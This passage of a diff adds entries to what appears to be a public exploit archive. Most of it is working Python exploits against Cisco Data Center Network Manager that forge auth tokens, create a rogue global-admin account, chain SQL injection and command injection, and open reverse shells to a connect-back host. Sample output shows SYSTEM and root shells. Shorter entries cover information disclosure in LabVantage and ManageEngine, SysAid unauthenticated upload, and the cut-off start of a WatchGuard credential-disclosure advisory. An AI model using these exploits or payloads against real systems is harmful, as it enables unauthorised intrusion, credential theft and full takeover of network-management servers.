+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/LogonWSService/LogonWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "return":
+            return elem.text
+    return False
+
+def craft_soap_header(target, usr, pwd):
+    """ this generates the soap header """
+    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
+    soap_header += '<m:token xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:token>' % gen_token(target, usr, pwd)
+    soap_header += '\t</SOAP-ENV:Header>'
+    return soap_header
+
+def load_remote_class(target, smb, usr, pwd):
+    """ this triggers the cmdi """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header(target, usr, pwd)
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:importTS>'
+    soap_body += '\t\t\t<certFile>" -providerclass Si -providerpath "%s</certFile>' % smb
+    soap_body += '\t\t\t<serverIPAddress></serverIPAddress>'
+    soap_body += '\t\t</ep:importTS>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/SanWSService/SanWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "resultMessage":
+            if elem.text == "Success":
+                return True
+    return False
+
+def handler(lp):
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp, s, usr, pwd):
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    load_remote_class(t, s, usr, pwd)
+
+def main():
+    usr = "hacker"
+    pwd = "Hacked123"
+    if len(sys.argv) != 5:
+        print "(+) usage: %s <target> <connectback:port> <smbserver> <smbpath>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.122 192.168.100.159:1337 vmware-host '\\Shared Folders\\tools'" % sys.argv[0]
+        sys.exit(1)
+    t = sys.argv[1]
+    c = sys.argv[2]
+    s = "\\\\%s%s" % (sys.argv[3], sys.argv[4])
+    i = 0
+
+    if not ":" in c:
+        print "(+) using default connectback port 4444"
+        ls = c
+        lp = 4444
+    else:
+        if not c.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = c.split(":")[0]
+        lp = int(c.split(":")[1])
+
+    # InheritableThreadLocal.childValue performs a 'shallow copy' and causes a small race condition
+    while 1:
+        i += 1
+        print "(+) attempting auth bypass %d" % i
+        raw = make_raw_token(t)
+        cryptor = AESCipher()
+        token = cryptor.encrypt(raw)
+        if bypass_auth(t, token, usr, pwd):
+            if not user_added_already:
+                print "(+) bypassed auth! added a global admin %s:%s" % (usr, pwd)
+            else:
+                print "(+) we probably already bypassed auth! try the account %s:%s" % (usr, pwd)
+            break
+        sys.stdout.write('\x1b[1A')
+        sys.stdout.write('\x1b[2K')
+
+    # we have bypassed the authentication at this point
+    print "(+) attempting to load class from %s\\Si.class" % s
+    exec_code(t, lp, s, usr, pwd)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48019.py b/exploits/java/webapps/48019.py
new file mode 100755
index 000000000..f689c0a1a
--- /dev/null
+++ b/exploits/java/webapps/48019.py
@@ -0,0 +1,323 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager HostEnclHandler getVmHostData SQL Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 Installer for Windows (64-bit)
+- Release: 11.2(1)
+- Release Date: 18-Jun-2019
+- FileName: dcnm-installer-x64-windows.11.2.1.exe.zip
+- Size: 1619.36 MB (1698022100 bytes)
+- MD5 Checksum: e50f8a6b2b3b014ec022fe40fabcb6d5 
+
+Bug 1: CVE-2019-15976 / ZDI-20-008
+Bug 2: CVE-2019-15984 / ZDI-20-060
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback>
+(+) eg: ./poc.py 192.168.100.122 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.122 192.168.100.59:1337
+(+) created the account hacker:Hacked123
+(+) created the 1337/custom path!
+(+) leaked vfs! temp230cf31722794196/content-ed98b5003b1c695c
+(+) SQL Injection working!
+(+) wrote the si.jsp shell!
+(+) cleaned up the database!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.122
+(+) pop thy shell!
+Microsoft Windows [Version 6.3.9600]
+(c) 2013 Microsoft Corporation. All rights reserved.
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>whoami
+whoami
+nt authority\system
+
+C:\Program Files\Cisco Systems\dcm\wildfly-10.1.0.Final\bin\service>
+
+Clean Up:
+=========
+
+1. delete from xmlDocs where user_name = '1337';
+2. delete si.jsp from the web root
+3. delete the folder and its contents: C:/Program Files/Cisco Systems/dcm/fm/reports/1337
+"""
+
+import re
+import md5
+import sys
+import time
+import socket
+import base64
+import requests
+import telnetlib
+from threading import Thread
+from xml.etree import ElementTree
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def _get_jsp(cbh, cbp):
+    """ get me some jsp for a connectback! """
+    jsp = """
+    <%%@page import="java.lang.*"%%>
+    <%%@page import="java.util.*"%%>
+    <%%@page import="java.io.*"%%>
+    <%%@page import="java.net.*"%%>
+
+    <%%
+      // clean up
+      String[] files = {
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/si.xml", 
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/custom/",
+          "C:/Program Files/Cisco Systems/dcm/fm/reports/1337/",
+      };
+      for (String s:files){ File f = new File(s); f.delete(); }
+      File f = new File(application.getRealPath("/" + this.getClass().getSimpleName().replaceFirst("_",".")));
+      f.delete();
+      class StreamConnector extends Thread
+      {
+        InputStream we;
+        OutputStream uo;
+
+        StreamConnector( InputStream we, OutputStream uo )
+        {
+          this.we = we;
+          this.uo = uo;
+        }
+
+        public void run()
+        {
+          BufferedReader dy  = null;
+          BufferedWriter zvi = null;
+          try
+          {
+            dy  = new BufferedReader( new InputStreamReader( this.we ) );
+            zvi = new BufferedWriter( new OutputStreamWriter( this.uo ) );
+            char buffer[] = new char[8192];
+            int length;
+            while( ( length = dy.read( buffer, 0, buffer.length ) ) > 0 )
+            {
+              zvi.write( buffer, 0, length );
+              zvi.flush();
+            }
+          } catch( Exception e ){}
+          try
+          {
+            if( dy != null )
+              dy.close();
+            if( zvi != null )
+              zvi.close();
+          } catch( Exception e ){}
+        }
+      }
+
+      try
+      {
+        String ShellPath;
+        ShellPath = new String("cmd.exe");
+        Socket socket = new Socket( "%s", %s);
+        Process process = Runtime.getRuntime().exec( ShellPath );
+        ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
+        ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
+      } catch( Exception e ) {}
+    %%>
+    """ % (cbh, cbp)
+    return jsp
+
+def get_session(target, user, password):
+    """ we have bypassed auth at this point and created an admin """
+    d = {
+        "j_username" : user,
+        "j_password" : password
+    }
+    uri = "https://%s/j_spring_security_check" % target
+    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+    if "Set-Cookie" in r.headers:
+        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,4}:.{44});", r.headers["Set-Cookie"])
+        if match:
+            sessionid = match.group(1)
+            resttoken = match.group(2)
+            return { "JSESSIONID" : sessionid, "resttoken": resttoken}
+    return False
+
+def craft_soap_header():
+    soap_header  = '\t<SOAP-ENV:Header xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">'
+    soap_header += '<m:ssoToken xmlns:m="http://ep.jaxws.dcbu.cisco.com/">%s</m:ssoToken>' % gen_ssotoken()
+    soap_header += '\t</SOAP-ENV:Header>'
+    return soap_header
+
+def we_can_trigger_folder_path_creation(target):
+    """ craft the path location and db entry for the traversal """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:saveReportTemplate>'
+    soap_body += '\t\t\t<reportTemplateName>si</reportTemplateName>'
+    soap_body += '\t\t\t<userName>1337</userName>'
+    soap_body += '\t\t\t<updatedAttrs></updatedAttrs>'
+    soap_body += '\t\t\t<pmInterval>1337</pmInterval>'
+    soap_body += '\t\t</ep:saveReportTemplate>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/ReportWSService/ReportWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def we_can_trigger_second_order_write(target, shellpath):
+    """ trigger the traversal """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:openReportTemplate>'
+    soap_body += '\t\t\t<reportTemplateName>%s</reportTemplateName>' % shellpath
+    soap_body += '\t\t\t<userName>1337</userName>'
+    soap_body += '\t\t</ep:openReportTemplate>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/ReportWSService/ReportWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def gen_ssotoken():
+    """ auth bypass """
+    timestamp = 9999999999999  # we live forever
+    username = "hax"           # doesnt even need to exist!
+    sessionid = 1337           # doesnt even need to exist!
+    d = "%s%d%dPOsVwv6VBInSOtYQd9r2pFRsSe1cEeVFQuTvDfN7nJ55Qw8fMm5ZGvjmIr87GEF" % (username, sessionid, timestamp)
+    return "%d.%d.%s.%s" % (sessionid, timestamp, base64.b64encode(md5.new(d).digest()), username)
+
+def we_can_trigger_sql_injection(target, sql):
+    """ stacked sqli primitive """
+    sqli = ";%s--" % sql
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:getVmHostData>'
+    soap_body += '\t\t\t<arg0>'
+    soap_body += '\t\t\t\t<sortField>vcluster</sortField>'
+    soap_body += '\t\t\t\t<sortType>%s</sortType>' % sqli
+    soap_body += '\t\t\t</arg0>'
+    soap_body += '\t\t\t<arg1></arg1>'
+    soap_body += '\t\t\t<arg2></arg2>'
+    soap_body += '\t\t\t<arg3>false</arg3>'
+    soap_body += '\t\t</ep:getVmHostData>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/DbInventoryWSService/DbInventoryWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    if r.status_code == 200:
+        return True
+    return False
+
+def we_can_leak_vfs(target):
+    """ we use a information disclosure for the vfs path """
+    global vfs
+    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+    c = requests.auth.HTTPBasicAuth('admin', 'nbv_12345')
+    r = requests.get(uri, verify=False, auth=c)
+    match = re.search(r"temp\\(.{21}content-.{15,16})", r.text)
+    if match:
+        vfs = str(match.group(1).replace("\\","/"))
+        return True
+    return False
+
+def handler(lp):
+    """ this is the client handler, to catch the connectback """
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, usr, pwd, cbp):
+    """ this function threads the client handler and sends off the attacking payload """
+    handlerthr = Thread(target=handler, args=(int(cbp),))
+    handlerthr.start()
+    r = requests.get("https://%s/si.jsp" % t, cookies=get_session(t, usr, pwd), verify=False)
+
+def we_can_add_user(target, usr, pwd):
+    """ add a user so that we can reach our backdoor! """
+    soap_body  = '<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ep="http://ep.san.jaxws.dcbu.cisco.com/">'
+    soap_body += craft_soap_header()
+    soap_body += '\t<soapenv:Body>'
+    soap_body += '\t\t<ep:addUser>'
+    soap_body += '\t\t\t<userName>%s</userName>' % usr
+    soap_body += '\t\t\t<password>%s</password>' % pwd
+    soap_body += '\t\t\t<roleName>global-admin</roleName>'
+    soap_body += '\t\t\t<enablePwdExpiration>false</enablePwdExpiration>'
+    soap_body += '\t\t</ep:addUser>'
+    soap_body += '\t</soapenv:Body>'
+    soap_body += '</soapenv:Envelope>'
+    uri = "https://%s/DbAdminWSService/DbAdminWS" % target
+    r = requests.post(uri, data=soap_body, verify=False)
+    tree = ElementTree.fromstring(r.content)
+    for elem in tree.iter():
+        if elem.tag == "resultMessage":
+            res = elem.text
+    if res == "Success":
+        return True
+    elif res == "User already exists.":
+        return True
+    return False
+
+def main():
+
+    usr = "hacker"
+    pwd = "Hacked123"
+
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.122 192.168.100.59:1337" % sys.argv[0]
+        sys.exit(1)
+
+    t = sys.argv[1]
+    c = sys.argv[2]
+
+    cbh = c.split(":")[0]
+    cbp = c.split(":")[1]
+    sc = _get_jsp(cbh, cbp).encode("hex")
+
+    # stage 1 - add a user
+    if we_can_add_user(t, usr, pwd):
+        print "(+) created the account %s:%s" % (usr, pwd)
+
+        # stage 2 - trigger folder creation and db entry
+        if we_can_trigger_folder_path_creation(t):
+            print "(+) created the 1337/custom path!"
+
+            # stage 3 - leak the vfs path (not really required I suppose)
+            if we_can_leak_vfs(t):
+                print "(+) leaked vfs! %s" % vfs
+
+                # stage 4 - trigger the sql injection to update our template entry
+                sp = "../../../../wildfly-10.1.0.Final/standalone/tmp/vfs/temp/%s/si.jsp" % vfs
+                sql = "update xmldocs set document_name='%s',content=decode('%s','hex') where user_name='1337';" % (sp, sc)
+                if we_can_trigger_sql_injection(t, sql):
+                    print "(+) SQL Injection working!"
+
+                    # stage 5 - trigger the shell write
+                    if we_can_trigger_second_order_write(t, sp):
+                        print "(+) wrote the si.jsp shell!"
+
+                        # stage 6 - cleanup
+                        sql = "delete from xmldocs where user_name='1337';"
+                        if we_can_trigger_sql_injection(t, sql):
+                            print "(+) cleaned up the database!"
+
+                        # stage 7 - go get some rce
+                        exec_code(t, usr, pwd, cbp)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48020.py b/exploits/java/webapps/48020.py
new file mode 100755
index 000000000..d4e09caa9
--- /dev/null
+++ b/exploits/java/webapps/48020.py
@@ -0,0 +1,201 @@
+#!/usr/bin/python
+"""
+Cisco Data Center Network Manager LanFabricImpl createLanFabric Command Injection Remote Code Execution Vulnerability
+
+Tested on: Cisco DCNM 11.2.1 ISO Virtual Appliance for VMWare, KVM and Bare-metal servers
+- Release: 11.2(1)
+- Release Date: 05-Jun-2019
+- FileName: dcnm-va.11.2.1.iso.zip
+- Size: 4473.54 MB (4690850167 bytes)
+- MD5 Checksum: b1bba467035a8b41c63802ce8666b7bb 
+
+Bug 1: CVE-2019-15977 / ZDI-20-012
+Bug 2: CVE-2019-15977 / ZDI-20-013
+Bug 3: CVE-2019-15978 / ZDI-20-102
+
+Example:
+========
+
+saturn:~ mr_me$ ./poc.py 
+(+) usage: ./poc.py <target> <connectback:port>
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59
+(+) eg: ./poc.py 192.168.100.123 192.168.100.59:1337
+
+saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.59:1337
+(+) leaked user: root
+(+) leaked pass: Dcnmpass123
+(+) leaked vfs path: temp18206a94b7c45072/content-85ba056e1faec012
+(+) created a root session!
+(+) starting handler on port 1337
+(+) connection from 192.168.100.123
+(+) pop thy shell!
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux localhost 3.10.0-957.10.1.el7.x86_64 #1 SMP Mon Mar 18 15:06:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+"""
+
+import re
+import sys
+import random
+import socket
+import string
+import requests
+import telnetlib
+from threading import Thread
+from Crypto.Cipher import Blowfish
+from requests.auth import HTTPBasicAuth
+from requests.packages.urllib3.exceptions import InsecureRequestWarning
+requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
+
+def handler(lp):
+    print "(+) starting handler on port %d" % lp
+    t = telnetlib.Telnet()
+    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+    s.bind(("0.0.0.0", lp))
+    s.listen(1)
+    conn, addr = s.accept()
+    print  "(+) connection from %s" % addr[0]
+    t.sock = conn
+    print "(+) pop thy shell!"
+    t.interact()
+
+def exec_code(t, lp, s):
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    c = { "JSESSIONID" : sessionid }
+    r = requests.get("https://%s/%s" % (t, s), cookies=c, verify=False)
+
+def random_string(string_length = 8):
+    """ generate a random string of fixed length """
+    letters = string.ascii_lowercase
+    return ''.join(random.choice(letters) for i in range(string_length))
+
+def decrypt(key):
+    """ decrypt the leaked password """
+    cipher = Blowfish.new("jaas is the way", Blowfish.MODE_ECB)
+    msg = cipher.decrypt(key.decode("hex"))
+    return msg
+
+def we_can_leak(target):
+    """ used to bypass auth """
+    global dbuser, dbpass, vfspth, jdbc, rootuser, rootpass
+    dbuser = None
+    dbpass = None 
+    vfspth = None
+    rootuser = None
+    rootpass = None
+    jdbc = None
+    uri = 'https://%s/serverinfo/HtmlAdaptor?action=displayServerInfos' % target
+    c = HTTPBasicAuth('admin', 'nbv_12345')
+    r = requests.get(uri, verify=False, auth=c)
+    leaked = r.text
+    match = re.search("db.password = #(.*)", leaked)
+    if match:
+        dbpass = match.group(1)
+    match = re.search("db.user = (.*)", leaked)
+    if match:
+        dbuser = match.group(1)
+    match = re.search("dcnmweb = (.*)", leaked)
+    if match:
+        vfspth = match.group(1)
+    match = re.search("db.url = (.*)", leaked)
+    if match:
+        jdbc = match.group(1)
+    match = re.search("server.sftp.password = #(.*)", leaked)
+    if match:
+        rootpass = match.group(1)
+    match = re.search("server.sftp.username = (.*)", leaked)
+    if match:
+        rootuser = match.group(1)
+    if dbuser and dbpass and vfspth and jdbc and rootuser and rootpass:
+        return True
+    return False
+
+def we_can_login(target, password):
+    """ we have bypassed auth at this point by leaking the creds """
+    global sessionid, resttoken
+    d = {
+        "j_username" : rootuser,
+        "j_password" : password,
+    }
+    uri = "https://%s/j_spring_security_check" % target
+    r = requests.post(uri, data=d, verify=False, allow_redirects=False)
+    if "Set-Cookie" in r.headers:
+        match = re.search(r"JSESSIONID=(.{56}).*resttoken=(\d{1,3}:.{44});", r.headers["Set-Cookie"])
+        if match:
+            sessionid = match.group(1)
+            resttoken = match.group(2)
+            return True
+    return False
+
+def pop_a_root_shell(t, ls, lp):
+    """ get dat shell! """
+    handlerthr = Thread(target=handler, args=(lp,))
+    handlerthr.start()
+    uri = "https://%s/rest/fabrics" % t
+    cmdi  = "%s\";'`{ruby,-rsocket,-e'c=TCPSocket.new(\"%s\",\"%d\");" % (random_string(), ls, lp)
+    cmdi += "while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print(io.read)}end'}`'\""
+    j = { 
+        "name" : cmdi,
+
+        # this is needed to pass validate() on line 149 of the LanFabricImpl class
+        "generalSetting" : {
+            "asn" : "1337",
+            "provisionOption" : "Manual"
+        }, 
+        "provisionSetting" : {
+            "dhcpSetting": {
+                "primarySubnet" : "127.0.0.1",
+                "primaryDNS" : "127.0.0.1",
+                "secondaryDNS" : "127.0.0.1"
+            },
+            "ldapSetting" : {
+                "server" : "127.0.0.1"
+            },
+            "amqpSetting" : {
+                "server" : "127.0.0.1:1337"
+            }
+        }
+    }
+    c = { "resttoken": resttoken }
+    r = requests.post(uri, json=j, cookies=c, verify=False)
+    if r.status_code == 200 and ls in r.text:
+        return True
+    return False
+
+def main():
+    if len(sys.argv) != 3:
+        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.59" % sys.argv[0]
+        print "(+) eg: %s 192.168.100.123 192.168.100.59:1337" % sys.argv[0]
+        sys.exit(1)
+    t = sys.argv[1]
+    cb = sys.argv[2]
+    if not ":" in cb:
+        print "(+) using default connectback port 4444"
+        ls = cb
+        lp = 4444
+    else:
+        if not cb.split(":")[1].isdigit():
+            print "(-) %s is not a port number!" % cb.split(":")[1]
+            sys.exit(-1)
+        ls = cb.split(":")[0]
+        lp = int(cb.split(":")[1])
+
+    # stage 1 - leak the creds
+    if we_can_leak(t):
+        pwd = re.sub(r'[^\x20-\x7F]+','', decrypt(rootpass))
+        print "(+) leaked user: %s" % rootuser
+        print "(+) leaked pass: %s" % pwd
+        print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])
+
+        # stage 2 - get a valid sesson
+        if we_can_login(t, pwd):
+            print "(+) created a root session!"
+
+            # stage 3 - get a root shell via cmdi
+            pop_a_root_shell(t, ls, lp)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/exploits/java/webapps/48090.py b/exploits/java/webapps/48090.py
new file mode 100755
index 000000000..33263780b
--- /dev/null
+++ b/exploits/java/webapps/48090.py
@@ -0,0 +1,70 @@
+# Exploit Title: LabVantage 8.3 - Information Disclosure
+# Google Dork: N/A
+# Date: 2020-02-16
+# Exploit Author: Joel Aviad Ossi
+# Vendor Homepage: labvantage.com
+# Software Link: N/A
+# Version: LabVantage 8.3
+# Tested on: *
+# CVE : N/A
+
+
+import requests
+import operator
+
+
+def exploit(target):
+    print("[+] Fetching LabVantage Database Name..")
+    start = "name=\"database\" id=\"database\" value=\""
+    end = "\" >"
+    vstart = "<img src=\"WEB-OPAL/layouts/images/logo_white.png\" title=\""
+    vend = "viewportTest"
+    print("[+] Testing URL: " + target)
+    r = requests.get(target)
+    memory = r.text
+    print("[+] DB: " + memory[memory.find(start) + len(start):memory.rfind(end)])
+    print("[+] VERSION: " + memory[memory.find(vstart) + len(vstart):memory.rfind(vend)][:-71])
+    print("[+] Vulnerable!")
+
+
+def vuln_check():
+    target = input("\nTARGET HOST URL (example: target.com:8080): ")
+    print('[+] Checking if Host is vulnerable.')
+    target = (str(target) + "/labservices/logon.jsp")
+    r = requests.get(target)
+    memory = r.text
+    s = "name=\"database\" id=\"database\" value=\""
+    if not operator.contains(memory, s):
+        print("[-] Not Vulnerable!")
+        exit(0)
+    else:
+        exploit(target)
+
+
+def attack():
+    target = input("\nTARGET HOST URL (example: http://target.com:8080): ")
+    enum = input("\nDB NAME TO CHECK: ")
+    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0',
+               'Content-Type': 'application/x-www-form-urlencoded'}
+    payload = ({'nexturl': 'null', 'ignorelogonurl': 'N', 'ignoreexpirywarning': 'false',
+                '_viewport': 'null', 'username': 'null', 'password': 'null',
+                'database': ''+str(enum)+'', 'csrftoken': 'null'})
+    target = (str(target) + "/labservices/rc?command=login")
+    print("[+] Testing URL: " + target)
+    r = requests.post(target, headers=headers, data=payload)
+    memory = r.text
+    start = "Unrecognized"
+    if start in memory:
+        print('[+] DB NOT FOUND!')
+    else:
+        print('[!] NO FOUND!')
+
+
+print("\n1. Vulnerability Check\n2. DB Name Enumeration\n")
+option = input("CHOSE OPTION: ")
+if option == "1":
+    vuln_check()
+elif option == "2":
+    attack()
+else:
+    print("Wrong option selected, try again!")
\ No newline at end of file
diff --git a/exploits/java/webapps/48119.txt b/exploits/java/webapps/48119.txt
new file mode 100644
index 000000000..67236c4f3
--- /dev/null
+++ b/exploits/java/webapps/48119.txt
@@ -0,0 +1,79 @@
+# Exploit Title: ManageEngine EventLog Analyzer 10.0 - Information Disclosure
+# Date: 2020-02-23
+# Author:Scott Goodwin
+# Vendor: https://www.manageengine.com/
+# Software Link: https://www.manageengine.com/products/eventlog/
+# CVE: CVE-2019-19774
+
+Vulnerability Name: Authenticated Information Disclosure in ManageEngine EventLog Analyzer
+Registered: CVE-2019-19774
+
+Discoverer:
+Scott Goodwin, OSCP
+OCD Tech
+
+Vendor of Product:
+ManageEngine
+
+Affected Product Code Base:
+EventLog Analyzer - 10.0 SP1
+
+Affected Component:
+Affected ManageEngine endpoint: http://exampleclient:8400/event/runquery.do
+This endpoint allows the ManageEngine user to execute commands against the
+ManageEngine PostgreSQL database.
+
+Attack Type:
+Remote
+
+Vulnerability Type:
+Incorrect Access Control
+
+Vulnerability Impact:
+Authenticated Information Disclosure
+
+Attack Vector:
+To exploit the vulnerability, an authenticated user must execute a specially crafted
+query against the ManageEngine database to bypass the built-in security controls and
+extract credential data.
+
+Vulnerability Description:
+An issue was discovered in Zoho ManageEngine EventLog Analyzer 10.0 SP1.
+By running "select hostdetails from hostdetails" at the /event/runquery.do endpoint,
+it is possible to bypass the security restrictions that prevent even administrative
+users from viewing credential data stored in the database, and recover the MD5 hashes
+of the accounts used to authenticate the ManageEngine platform to the managed machines
+on the network (most often administrative accounts). Specifically, this bypasses the
+following restrictions: a query cannot mention "password", and a query result cannot
+have a "password" column.
+
+PoC: Run the database query: "select hostdetails from hostdetails" at the /event/runquery.do endpoint
+
+Reporting Timeline:
+10/30/2019: This vulnerability was reported to ManageEngine via the
+Zoho/ManageEngine Bug Bounty program. They acknowledged the initial report.
+12/12/2019: Vulnerability registered
+12/13/2019: Vulnerability acknowledged and update (12110) made available to ManageEngine
+customers.
+12/13/2019: Public disclosure
+
+Additional Information:
+This query bypasses the following security restrictions implemented within Manage Engine:
+  1. restrictions on queries that include the word "password". This query will output the
+  value stored in the "password" field, without the word "password" actually appearing in
+  the query. If the query contains the word "password" Manage Engine will not execute the query.
+  2. restrictions on printing the password field to the screen in a column called "password".
+  If the results of the query include a columncalled "password", Manage Engine will mask the
+  password with a series of asterisks "". This query will output the entire contents of the table,
+  without formatting is as a table within the web interface, which leads to bypass of this security
+  control.
+
+Remediated Product Version:
+ManageEngine EventLog Analyzer Build 12110
+
+Reference:
+https://www.manageengine.com/products/eventlog/
+https://www.manageengine.com/products/eventlog/features-new.html#release
+https://gist.github.com/scottgoodwin90/19ccecdc9f5733c0a9381765cfc7fe39
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-19774
+https://ocd-tech.com
\ No newline at end of file
diff --git a/exploits/java/webapps/48188.txt b/exploits/java/webapps/48188.txt
new file mode 100644
index 000000000..b937f633e
--- /dev/null
+++ b/exploits/java/webapps/48188.txt
@@ -0,0 +1,38 @@
+# Exploit Title: Sysaid 20.1.11 b26 - Remote Command Execution
+# Google Dork: intext:"Help Desk Software by SysAid <http://www.sysaid.com/>"
+# Date: 2020-03-09
+# Exploit Author: Ahmed Sherif
+# Vendor Homepage: https://www.sysaid.com/free-help-desk-software
+# Software Link: [https://www.sysaid.com/free-help-desk-software
+# Version:  Sysaid v20.1.11 b26
+# Tested on: Windows Server 2016
+# CVE : None
+
+GhostCat Attack
+
+The default
+installation of Sysaid is enabling the exposure of AJP13 protocol which is used
+by tomcat instance, this vulnerability has been released recently on
+different blogposts
+<https://www.zdnet.com/article/ghostcat-bug-impacts-all-apache-tomcat-versions-released-in-the-last-13-years/>.
+
+
+*Proof-of-Concept*
+
+[image: image.png]
+
+The
+attacker would be able to exploit the vulnerability and read the Web.XML of
+Sysaid.
+Unauthenticated File Upload
+
+It was
+found on the Sysaid application that an attacker would be able to upload files
+without authenticated by directly access the below link:
+
+http://REDACTED:8080/UploadIcon.jsp?uploadChatFile=true&parent=
+
+
+
+In the above screenshot, it shows that an attacker can execute commands
+in the system without any prior authentication to the system.
\ No newline at end of file
diff --git a/exploits/java/webapps/48203.txt b/exploits/java/webapps/48203.txt
new file mode 100644
index 000000000..6f6a0f981
--- /dev/null
+++ b/exploits/java/webapps/48203.txt
@@ -0,0 +1,168 @@
+# Exploit: WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure 
+# Author: RedTeam Pentesting GmbH
+# Date: 2020-03-11
+# Vendor: https://www.watchguard.com
+# Software link: https://www.watchguard.com/help/docs/help-center/en-US/Content/en-US/Fireware/services/tdr/tdr_ad_helper_c.html
+# CVE: N/A
+
+Advisory: Credential Disclosure in WatchGuard Fireware AD Helper Component
+
+RedTeam Pentesting discovered a credential-disclosure vulnerability in
+the AD Helper component of the WatchGuard Fireware Threat Detection and
+Response (TDR) service, which allows unauthenticated attackers to gain
+Active Directory credentials for a Windows domain in plaintext.
+
+
+Details
+=======
+
+Product: WatchGuard Fireware AD Helper Component
+Affected Versions: 5.8.5.10233, < 5.8.5.10317
